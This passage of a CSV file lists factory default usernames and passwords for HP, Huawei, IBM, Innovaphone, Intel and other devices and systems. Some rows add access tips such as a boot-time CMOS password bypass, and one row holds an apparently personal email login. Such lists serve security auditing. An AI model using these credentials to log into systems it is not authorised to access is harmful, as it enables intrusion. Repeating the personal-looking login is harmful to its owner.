MPE/xx,,Multi,MANAGER,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TCH,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CONV,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,,,\nhewlettpackard,HP Jetdirect (All Models),,,,,,Any,\nhewlettpackard,ISEE,,Multi,admin,isee,Admin,,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to print it out,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet,\nhewlettpackard,MPE-XL,,,HELLO,FIELD.SUPPORT,,,\nhewlettpackard,MPE-XL,,,HELLO,MANAGER.SYS,,,\nhewlettpackard,MPE-XL,,,HELLO,MGR.SYS,,,\nhewlettpackard,MPE-XL,,,MANAGER,HPOFFICE,,,\nhewlettpackard,MPE-XL,,,MGR,CAROLIAN,,,\nhewlettpackard,MPE-XL,,,MGR,CCC,,,\nhewlettpackard,MPE-XL,,,OPERATOR,COGNOS,,,\nhewlettpackard,Motive Chorus,,HTTP (port 5060),admin,isee,,,\nhewlettpackard,Officejet,all versions,http,admin,,admin,http interface,\nhewlettpackard,Power Manager,3,HTTP,admin,admin,Admin,,\nhewlettpackard,ProcCurve MSC-5100,,,admin,admin,,,\nhewlettpackard,StoreOnce,,,HPSupport,badg3r5,,,\nhewlettpackard,Vectra,,Console,,hewlpack,Admin,,\nhewlettpackard,iLo,,http,Admin,Admin,Admin,,\nhewlettpackard,iLo,,http,oper,oper,,,\nhewlettpackard,sa7200,,Multi,admin,,Admin,,\nhewlettpackard,sa7200,,Multi,admin,admin,Admin,,\nhewlettpackard,webmin,0.84,HTTP,admin,hp.com,Admin,,\nhoneywell,Experion,,,LocalComServer,LCS pwd 03,,,\nhoneywell,Experion,,,TPSLocalServer,TLS pwd 03,,,\nhorizon datasys,FoolProof,,,,foolproof,,,\nhorizondatasys,FoolProof,,,,foolproof,Admin,,\nhosting controller,Hosting Controller,,,AdvWebadmin,advcomm500349,,,\nhp,MSA2000 G3,,,admin,!admin,,,\nhp,sa7200,,,admin,,,,\nhp,sa7200,,Admin,admin,,,,\nhp,sa7200,,Admin,admin,admin,,,\nhuawei,B200,Globe Broadband Firmware,,,,,,\nhuawei,B932,,http:192.168.1.1,,,,,\nhuawei,B933,Globe BroadBand Firmware,,,,,,\nhuawei,B933,Smart Bro Firmware,,,,,,\nhuawei,B970,etc,192.168.1.1,,admin,admin,,\nhuawei,D100,Huawei Firmware,,,,,,\nhuawei,D100T,Huawei Firmware,,,,,,\nhuawei,E153,11.609.18.21.135,192.168.1.1,admin,admin,admin,,\nhuawei,E226,,,admin,admin,,,\nhuawei,E583C,,192.168.1.1,,admin,Admin,,\nhuawei,E585,,192.168.1.1,Admin,Admin,Admin,Case sensitive,\nhuawei,E585u-82,,192.168.1.1 or http://pocket.wifi,Admin,Admin,Admin,Case sensitive,\nhuawei,E960,,,admin,admin,Admin,,\nhuawei,E960,Etisalat Firmware,,,,,,\nhuawei,E960,STC Firmware,192.168.1.1,admin,admin,,,\nhuawei,EchoLife BM621,Huawei Firmware,,admin,2008x2BJAOTOtJK1,,,\nhuawei,EchoLife HG510a,VNPT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,Huawei Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,TE Data Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,TT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520c,Vodafone Firmware,,,,,,\nhuawei,EchoLife HG520i,To2Proxy Firmware,,admin,admin,,,\nhuawei,EchoLife HG520s,STC Firmware,,admin,admin,,,\nhuawei,EchoLife HG520s,Saudi Telecom Firmware,,Afaq_shamel,stccpe_2007,,,\nhuawei,EchoLife HG520s,TT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520v,Huawei Turkish Firmware,,admin,admin,,,\nhuawei,EchoLife HG521,Huawei Firmware,,admin,,2012-01-08,,\nhuawei,EchoLife HG532,Huawei Firmware,,admin,,2012-01-08,,\nhuawei,EchoLife HG532b,STC Firmware,,admin,admin,,,\nhuawei,EchoLife HG851,Huawei Firmware,,admin,password,,,\nhuawei,Echolife HG510,Huawei Firmware,,admin,admin,,,\nhuawei,Echolife HG510,Romania Tel Firmware,,admin,admin,,,\nhuawei,Echolife HG510,Serbian Telekom Firmware,,admin,admin,,,\nhuawei,Echolife HG553,Vodafone Italian Firmware,,,,,,\nhuawei,GlobeSurfer II,Virgin Broadband Firmware,,virgin,password,,,\nhuawei,HBI-200,rev A,//192.168.1.1,,,user,,\nhuawei,HG556a,Vodafone Spanish Firmware,,vodafone,vodafone,,,\nhuawei,K3765,,,admin,admin,,,\nhuawei,MT820,,HTTP,admin,admin,,,\nhuawei,MT880,,HTTP,admin,admin,,,\nhuawei,MT880r,,,TMAR#HWMT8007079,,,,\nhuawei,MT880r,,Multi,TMAR#HWMT8007079,,,,\nhuawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,,\nhuawei,Multiple,,,admin,admin,,,\nhuawei,Quidway WA1003A,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT800,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT820,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT841,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Triple-T Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Version E.37,,admin,admin,,,\nhuawei,SmartAX MT882,,,admin,admin,,,\nhuawei,SmartAX MT882,Arnet Spanish Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,CanTV Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,JazzTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,Opal Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,RomaniaTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,SrpskeTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,FAWRI Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,Viettel Firmware,,admin,admin,,,\nhuawei,e226,,,admin,admin,,,\nhuwai,Modem,,,Admin,admin,,,\nhuwai,Modem,,Multi,Admin,admin,,,\nhyoco,Impress Pro digital sign board,,192.168.0.205 port 9997,no default,no default,,Access thru Hyoco app - get via ftp://hyocodistribution.com:9000,\nhyperic,Hyperic HQ Portal,,,hqadmin,hqadmin,,,\niblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line,\nibm,2210,,,def,trade,,RIP,\nibm,3534 F08 Fibre Switch,,,admin,password,,,\nibm,3534 F08 Fibre Switch,,Admin,admin,password,,,\nibm,3534 F08 Fibre Switch,,Multi,admin,password,Admin,,\nibm,3583 Tape Library,,HTTP,admin,secure,Admin,,\nibm,390e,,,,admin,,,\nibm,390e,,Admin,,admin,,,\nibm,390e,,Multi,,admin,Admin,,\nibm,600x,,,,admin,,,\nibm,600x,,Admin,,admin,,,\nibm,600x,,Multi,,admin,Admin,,\nibm,8224 HUB,,,vt100,public,,,\nibm,8224 HUB,,Admin,vt100,public,,,\nibm,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224,\nibm,8225,,,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8225,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,,\nibm,8237,,,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8237,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8237,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,,\nibm,8239 Token Ring HUB,,2.5,,R1QTPS,,,\nibm,8239 Token Ring HUB,,Utility Program,,R1QTPS,,,\nibm,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility Program,,\nibm,A21m,,,,,,,\nibm,A21m,,Admin,,,,,\nibm,A21m,,Multi,,,Admin,,\nibm,AIX,,,guest,guest,,,\nibm,AIX,,4.X,admin,admin,,,\nibm,AIX,,Multi,guest,,User,,\nibm,AIX,,Multi,guest,guest,User,,\nibm,AIX,,User,admin,admin,,,\nibm,AIX,,User,guest,,,,\nibm,AIX,,User,guest,guest,,,\nibm,AIX,4.X,Multi,admin,admin,User,,\nibm,AS/400,,,QSECOFR,QSECOFR,,Any,\nibm,AS/400,,,QSRV,QSRV,,,\nibm,AS/400,,,QSRVBAS,QSRVBAS,,,\nibm,AS/400,,,QUSER,QUSER,,OS/400,\nibm,AS/400,,,qpgmr,qpgmr,,,\nibm,AS/400,,,qsysopr,qsysopr,,,\nibm,Aptiva,,,,,CMOS,Press both mouse buttons repeatedly during boot to bypass CMOS password,\nibm,Ascend OEM Routers,,,,ascend,,,\nibm,Ascend OEM Routers,,Admin,,ascend,,,\nibm,Ascend OEM Routers,,Telnet,,ascend,Admin,,\nibm,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin,,\nibm,Bladecenter Advanced Management Module,,,USERID,PASSW0RD,,,\nibm,CICS,,,$SRV,$SRV,,,\nibm,CICS,,,CICSUSER,CISSUS,,,\nibm,CICS,,,DBDCCICS,DBDCCIC,,,\nibm,CICS,,,FORSE,FORSE,,,\nibm,CICS,,,OPER,OPER,,,\nibm,CICS,,,POST,BASE,,,\nibm,CICS,,,PRODCICS,PRODCICS,,,\nibm,CICS,,,PROG,PROG,,,\nibm,CICS,,,SYSA,SYSA,,,\nibm,CICS,,,VCSRV,VCSRV,,,\nibm,DB2,,,db2admin,db2admin,,WinNT,\nibm,DB2,,,db2fenc1,db2fenc1,,,\nibm,DB2,,,db2inst1,db2inst1,,,\nibm,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide,\nibm,Domino Go,,,webadmin,webibm,,,\nibm,Fibre Switch,,3534 F08,admin,password,,,\nibm,HMC,,,hscroot,abc123,,,\nibm,HMC,,,root,passw0rd,,,\nibm,Hardware Management Console,3,ssh,hscroot,abc123,Admin,,\nibm,IBM,,Multi,,,Admin,,\nibm,Infoprint 6700,,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalents as well.,\nibm,Information Archive Appliance,,,iscadmin,iscadmin,Information Archive Admin interface,,\nibm,Information Archive Appliance,,Cluster node servers,root,i8root,Root access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,admin,rsm33inst,Admin Access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,lservice,rsm33inst,Service Access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,root,rsm33inst,Root Access,,\nibm,Information Archive Appliance,,KVM Console,,,Access to the KVM Console,No password by default; if you find it password protected we can't help,\nibm,Information Archive Appliance,,Management console server,root,i8root,Root access,,\nibm,Information Archive Appliance,,Management console server; cluster node servers; RSM for Storage server;,iaadmin,iaadmin,Install upgrades and the IBM Systems Director interface,,\nibm,Integrated Management Module (IMM),,,USERID,PASSW0RD,,,\nibm,LAN Server / OS/2,,,username,password,,2.1 3.0 4.,\nibm,Lotus Domino Go WebServer (net.commerce edition),,,webadmin,webibm,,ANY ?,\nibm,NetCommerce PRO,,,ncadmin,ncadmin,,3.2,\nibm,OS/400,,,11111111,11111111,,,\nibm,OS/400,,,22222222,22222222,,,\nibm,OS/400,,,QSECOFR,QSECOFR,,OS/400,\nibm,OS/400,,,ibm,2222,,,\nibm,OS/400,,,ibm,password,,,\nibm,OS/400,,,ibm,service,,,\nibm,OS/400,,,qpgmr,qpgmr,,,\nibm,OS/400,,,qsecofr,11111111,,,\nibm,OS/400,,,qsecofr,22222222,,,\nibm,OS/400,,,qsecofr,qsecofr,,,\nibm,OS/400,,,qserv,qserv,,,\nibm,OS/400,,,qsrv,qsrv,,,\nibm,OS/400,,,qsrvbas,qsrvbas,,,\nibm,OS/400,,,qsvr,ibmcel,,,\nibm,OS/400,,,qsvr,qsvr,,,\nibm,OS/400,,,qsysopr,qsysopr,,,\nibm,OS/400,,,quser,quser,,,\nibm,OS/400,,,secofr,secofr,,,\nibm,OS/400,,,sedacm,secacm,,,\nibm,OS/400,,,sysopr,sysopr,,,\nibm,OS/400,,,user,USERP,,,\nibm,OS/400,,Multi,11111111,11111111,,,\nibm,OS/400,,Multi,22222222,22222222,,,\nibm,OS/400,,Multi,ibm,2222,,,\nibm,OS/400,,Multi,ibm,password,,,\nibm,OS/400,,Multi,ibm,service,,,\nibm,OS/400,,Multi,qpgmr,qpgmr,,,\nibm,OS/400,,Multi,qsecofr,11111111,,,\nibm,OS/400,,Multi,qsecofr,22222222,,,\nibm,OS/400,,Multi,qsecofr,qsecofr,,,\nibm,OS/400,,Multi,qserv,qserv,,,\nibm,OS/400,,Multi,qsrv,11111111,,,\nibm,OS/400,,Multi,qsrv,22222222,,,\nibm,OS/400,,Multi,qsrv,qsrv,,,\nibm,OS/400,,Multi,qsrvbas,qsrvbas,,,\nibm,OS/400,,Multi,qsvr,ibmcel,,,\nibm,OS/400,,Multi,qsvr,qsvr,,,\nibm,OS/400,,Multi,qsysopr,qsysopr,,,\nibm,OS/400,,Multi,quser,quser,,,\nibm,OS/400,,Multi,secofr,secofr,,,\nibm,OS/400,,Multi,sedacm,sedacm,,,\nibm,OS/400,,Multi,sysopr,sysopr,,,\nibm,OS/400,,Multi,userp,,No,,\nibm,PC BIOS,,,,IBM,,,\nibm,PC BIOS,,,,sertafu,,,\nibm,PC BIOS,,Admin,,IBM,,,\nibm,PC BIOS,,Admin,,MBIU0,,,\nibm,PC BIOS,,Admin,,sertafu,,,\nibm,PC BIOS,,Console,,IBM,Admin,,\nibm,PC BIOS,,Console,,MBIU0,Admin,,\nibm,PC BIOS,,Console,,merlin,No,,\nibm,PC BIOS,,Console,,sertafu,Admin,,\nibm,POS CMOS,,,ESSEX,,,,\nibm,POS CMOS,,,IPC,,,,\nibm,POS CMOS,,Console,ESSEX,,,,\nibm,POS CMOS,,Console,IPC,,,,\nibm,RACF,,,IBMUSER,SYS1,,,\nibm,RS/6000,,,root,ibm,,AIX,\nibm,RSA,,9091,wpsadmin,wpsadmin,,,\nibm,RSA,5,HTTP,wpsadmin,wpsadmin,9091,,\nibm,RSA,5.0,HTTP,wpsadmin,wpsadmin,9091,,\nibm,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin,,\nibm,SONAS,,,USERID,PASSWORD,,,\nibm,Sterling Managed File Transfer,,,fg_sysadmin,password,,,\nibm,T20,,Multi,,admin,Admin,,\nibm,T42,,HTTP,Administrator,admin,Admin,,\nibm,TS3100(3573-L2U),,http,admin,secure,,,\nibm,TS3100,,,admin,secure,,,\nibm,Tivoli,,,admin,admin,,,\nibm,Tivoli,,HTTP,admin,admin,Admin,,\nibm,TotalStorage Enterprise Server,,,storwatch,specialist,,,\nibm,TotalStorage Enterprise Server,,Admin,storwatch,specialist,,,\nibm,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin,,\nibm,TotalStorage,,,storwatch,specialist,,,\nibm,VM/CMS,,,$ALOC$,,,,\nibm,VM/CMS,,,ADMIN,,,,\nibm,VM/CMS,,,AP2SVP,,,,\nibm,VM/CMS,,,APL2PP,,,,\nibm,VM/CMS,,,AUTOLOG1,,,,\nibm,VM/CMS,,,BATCH,,,,\nibm,VM/CMS,,,BATCH1,,,,\nibm,VM/CMS,,,BATCH2,,,,\nibm,VM/CMS,,,CCC,,,,\nibm,VM/CMS,,,CMSBATCH,,,,\nibm,VM/CMS,,,CMSUSER,,,,\nibm,VM/CMS,,,CPNUC,,,,\nibm,VM/CMS,,,CPRM,,,,\nibm,VM/CMS,,,CSPUSER,,,,\nibm,VM/CMS,,,CVIEW,,,,\nibm,VM/CMS,,,DATAMOVE,,,,\nibm,VM/CMS,,,DEMO1,,,,\nibm,VM/CMS,,,DEMO2,,,,\nibm,VM/CMS,,,DEMO3,,,,\nibm,VM/CMS,,,DEMO4,,,,\nibm,VM/CMS,,,DIRECT,,,,\nibm,VM/CMS,,,DIRMAINT,,,,\nibm,VM/CMS,,,DISKCNT,,,,\nibm,VM/CMS,,,EREP,,,,\nibm,VM/CMS,,,FSFADMIN,,,,\nibm,VM/CMS,,,FSFTASK1,,,,\nibm,VM/CMS,,,FSFTASK2,,,,\nibm,VM/CMS,,,GCS,,,,\nibm,VM/CMS,,,IDMS,,,,\nibm,VM/CMS,,,IDMSSE,,,,\nibm,VM/CMS,,,IIPS,,,,\nibm,VM/CMS,,,IPFSERV,,,,\nibm,VM/CMS,,,ISPVM,,,,\nibm,VM/CMS,,,IVPM1,,,,\nibm,VM/CMS,,,IVPM2,,,,\nibm,VM/CMS,,,MAINT,,,,\nibm,VM/CMS,,,MOESERV,,,,\nibm,VM/CMS,,,NEVIEW,,,,\nibm,VM/CMS,,,OLTSEP,,,,\nibm,VM/CMS,,,OP1,,,,\nibm,VM/CMS,,,OPERATIONS,OPERATIONS,,,\nibm,VM/CMS,,,OPERATNS,,,,\nibm,VM/CMS,,,OPERATOR,,,,\nibm,VM/CMS,,,PDMREMI,,,,\nibm,VM/CMS,,,PENG,,,,\nibm,VM/CMS,,,PROCAL,,,,\nibm,VM/CMS,,,PRODBM,,,,\nibm,VM/CMS,,,PROMAIL,,,,\nibm,VM/CMS,,,PSFMAINT,,,,\nibm,VM/CMS,,,PVM,,,,\nibm,VM/CMS,,,RDM470,,,,\nibm,VM/CMS,,,ROUTER,,,,\nibm,VM/CMS,,,RSCS,,,,\nibm,VM/CMS,,,RSCSV2,,,,\nibm,VM/CMS,,,SAVSYS,,,,\nibm,VM/CMS,,,SFCMI,,,,\nibm,VM/CMS,,,SFCNTRL,,,,\nibm,VM/CMS,,,SMART,,,,\nibm,VM/CMS,,,SQLDBA,,,,\nibm,VM/CMS,,,SQLUSER,,,,\nibm,VM/CMS,,,SYSADMIN,,,,\nibm,VM/CMS,,,SYSCKP,,,,\nibm,VM/CMS,,,SYSDUMP1,,,,\nibm,VM/CMS,,,SYSERR,,,,\nibm,VM/CMS,,,SYSWRM,,,,\nibm,VM/CMS,,,TDISK,,,,\nibm,VM/CMS,,,TEMP,,,,\nibm,VM/CMS,,,TSAFVM,,,,\nibm,VM/CMS,,,VASTEST,,,,\nibm,VM/CMS,,,VM3812,,,,\nibm,VM/CMS,,,VMARCH,,,,\nibm,VM/CMS,,,VMASMON,,,,\nibm,VM/CMS,,,VMASSYS,,,,\nibm,VM/CMS,,,VMBACKUP,,,,\nibm,VM/CMS,,,VMBSYSAD,,,,\nibm,VM/CMS,,,VMMAP,,,,\nibm,VM/CMS,,,VMTAPE,,,,\nibm,VM/CMS,,,VMTLIBR,,,,\nibm,VM/CMS,,,VMUTIL,,,,\nibm,VM/CMS,,,VSEIPO,,,,\nibm,VM/CMS,,,VSEMAINT,,,,\nibm,VM/CMS,,,VSEMAN,,,,\nibm,VM/CMS,,,VTAM,,,,\nibm,VM/CMS,,,VTAM,VTAM,,,\nibm,VM/CMS,,,VTAMUSER,,,,\nibm,VM/CMS,,Multi,$ALOC$,,,,\nibm,VM/CMS,,Multi,ADMIN,,,,\nibm,VM/CMS,,Multi,AP2SVP,,,,\nibm,VM/CMS,,Multi,APL2PP,,,,\nibm,VM/CMS,,Multi,AUTOLOG1,,,,\nibm,VM/CMS,,Multi,BATCH,,,,\nibm,VM/CMS,,Multi,BATCH1,,,,\nibm,VM/CMS,,Multi,BATCH2,,,,\nibm,VM/CMS,,Multi,CCC,,,,\nibm,VM/CMS,,Multi,CMSBATCH,,,,\nibm,VM/CMS,,Multi,CMSBATCH,CMSBATCH,,,\nibm,VM/CMS,,Multi,CMSUSER,,,,\nibm,VM/CMS,,Multi,CPNUC,,,,\nibm,VM/CMS,,Multi,CPRM,,,,\nibm,VM/CMS,,Multi,CSPUSER,,,,\nibm,VM/CMS,,Multi,CVIEW,,,,\nibm,VM/CMS,,Multi,DATAMOVE,,,,\nibm,VM/CMS,,Multi,DEMO1,,,,\nibm,VM/CMS,,Multi,DEMO2,,,,\nibm,VM/CMS,,Multi,DEMO3,,,,\nibm,VM/CMS,,Multi,DEMO4,,,,\nibm,VM/CMS,,Multi,DIRECT,,,,\nibm,VM/CMS,,Multi,DIRMAINT,,,,\nibm,VM/CMS,,Multi,DISKCNT,,,,\nibm,VM/CMS,,Multi,EREP,,,,\nibm,VM/CMS,,Multi,FSFADMIN,,,,\nibm,VM/CMS,,Multi,FSFTASK1,,,,\nibm,VM/CMS,,Multi,FSFTASK2,,,,\nibm,VM/CMS,,Multi,GCS,,,,\nibm,VM/CMS,,Multi,IDMS,,,,\nibm,VM/CMS,,Multi,IDMSSE,,,,\nibm,VM/CMS,,Multi,IIPS,,,,\nibm,VM/CMS,,Multi,IPFSERV,,,,\nibm,VM/CMS,,Multi,ISPVM,,,,\nibm,VM/CMS,,Multi,IVPM1,,,,\nibm,VM/CMS,,Multi,IVPM2,,,,\nibm,VM/CMS,,Multi,MAINT,,,,\nibm,VM/CMS,,Multi,MAINT,MAINT,,,\nibm,VM/CMS,,Multi,MOESERV,,,,\nibm,VM/CMS,,Multi,NEVIEW,,,,\nibm,VM/CMS,,Multi,OLTSEP,,,,\nibm,VM/CMS,,Multi,OP1,,,,\nibm,VM/CMS,,Multi,OPERATNS,,,,\nibm,VM/CMS,,Multi,OPERATNS,OPERATNS,,,\nibm,VM/CMS,,Multi,OPERATOR,,,,\nibm,VM/CMS,,Multi,OPERATOR,OPERATOR,,,\nibm,VM/CMS,,Multi,PDMREMI,,,,\nibm,VM/CMS,,Multi,PENG,,,,\nibm,VM/CMS,,Multi,PROCAL,,,,\nibm,VM/CMS,,Multi,PRODBM,,,,\nibm,VM/CMS,,Multi,PROMAIL,,,,\nibm,VM/CMS,,Multi,PSFMAINT,,,,\nibm,VM/CMS,,Multi,PVM,,,,\nibm,VM/CMS,,Multi,RDM470,,,,\nibm,VM/CMS,,Multi,ROUTER,,,,\nibm,VM/CMS,,Multi,RSCS,,,,\nibm,VM/CMS,,Multi,RSCSV2,,,,\nibm,VM/CMS,,Multi,SAVSYS,,,,\nibm,VM/CMS,,Multi,SFCMI,,,,\nibm,VM/CMS,,Multi,SFCNTRL,,,,\nibm,VM/CMS,,Multi,SMART,,,,\nibm,VM/CMS,,Multi,SQLDBA,,,,\nibm,VM/CMS,,Multi,SQLUSER,,,,\nibm,VM/CMS,,Multi,SYSADMIN,,,,\nibm,VM/CMS,,Multi,SYSCKP,,,,\nibm,VM/CMS,,Multi,SYSDUMP1,,,,\nibm,VM/CMS,,Multi,SYSERR,,,,\nibm,VM/CMS,,Multi,SYSWRM,,,,\nibm,VM/CMS,,Multi,TDISK,,,,\nibm,VM/CMS,,Multi,TEMP,,,,\nibm,VM/CMS,,Multi,TSAFVM,,,,\nibm,VM/CMS,,Multi,VASTEST,,,,\nibm,VM/CMS,,Multi,VM3812,,,,\nibm,VM/CMS,,Multi,VMARCH,,,,\nibm,VM/CMS,,Multi,VMASMON,,,,\nibm,VM/CMS,,Multi,VMASSYS,,,,\nibm,VM/CMS,,Multi,VMBACKUP,,,,\nibm,VM/CMS,,Multi,VMBSYSAD,,,,\nibm,VM/CMS,,Multi,VMMAP,,,,\nibm,VM/CMS,,Multi,VMTAPE,,,,\nibm,VM/CMS,,Multi,VMTLIBR,,,,\nibm,VM/CMS,,Multi,VMUTIL,,,,\nibm,VM/CMS,,Multi,VSEIPO,,,,\nibm,VM/CMS,,Multi,VSEMAINT,,,,\nibm,VM/CMS,,Multi,VSEMAN,,,,\nibm,VM/CMS,,Multi,VTAM,,,,\nibm,VM/CMS,,Multi,VTAM,VTAM,,,\nibm,VM/CMS,,Multi,VTAMUSER,,,,\nibm,a20m,,,,admin,,,\nibm,a20m,,Admin,,admin,,,\nibm,a20m,,Multi,,admin,Admin,,\nibm,management hw,,Multi,USERID,PASSW0RD,admin,,\nibm,management hw,,admin,USERID,PASSW0RD,,,\nibm,routers,,router,msmadhuastro@gmail.com,06725A1201,,,\nibm,switch,8275-217,Telnet,admin,,Admin,,\niinet,Bob Lite,,10.1.1.1,,admin,Admin,,\niinet,Bob,,10.1.1.1,,admin,Admin,,\niinet,Bob2,,10.1.1.1,,admin,Admin,,\nimai,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4,\nimperiasoftware,Imperia Content Managment System,,,superuser,superuser,,Unix/NT,\ninedo,Proget,,,Admin,Admin,,,\ninformix,Database,,,informix,informix,,,\ninfosmart,SOHO router,,HTTP,admin,0,Admin,,\ninfotec,IS 2320,,web interface,admin,,,,\ninfotec,ISC2525,System v1.67 / NIB v5.14 / WIM v1.10,http://192.168.0.100,admin,,Admin,,\ninfotec,infotec IS 2416L,,http://192.168.1.102,,,admin,,\ninfrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,admin,infrant1,administrator,,\ninfrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,root,see note,,root password is generated on each boot with a hardcoded algorithm and the password cannot be permanently changed - once discovered it will always work after the device is rebooted,\ninnovaphone,IP 20,,,admin,ip20,,,\ninnovaphone,IP 21,,,admin,ip21,,,\ninnovaphone,IP 3000,,,admin,ip3000,,,\ninnovaphone,IP 305,,,admin,ip305Beheer,,,\ninnovaphone,IP 400,,,admin,ip400,,,\ninnovaphone,IP20,,Admin,admin,ip20,,,\ninnovaphone,IP20,,Multi,admin,ip20,Admin,,\ninnovaphone,IP3000,,Admin,admin,ip3000,,,\ninnovaphone,IP3000,,Multi,admin,ip3000,Admin,,\ninnovaphone,IP305,,,admin,ip305Beheer,,,\ninnovaphone,IP400,,Admin,admin,ip400,,,\ninnovaphone,IP400,,Multi,admin,ip400,Admin,,\nintegraltechnologies,RemoteView,4,Console,Administrator,letmein,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,1234,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,12345678,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,19750407,Admin,,\nintel,Express 520T Switch,,,setup,setup,,,\nintel,Express 520T Switch,,Multi,setup,setup,User,,\nintel,Express 520T Switch,,User,setup,setup,,,\nintel,Express 9520 Router,,,NICONEX,NICONEX,,,\nintel,Express 9520 Router,,Multi,NICONEX,NICONEX,User,,\nintel,Express 9520 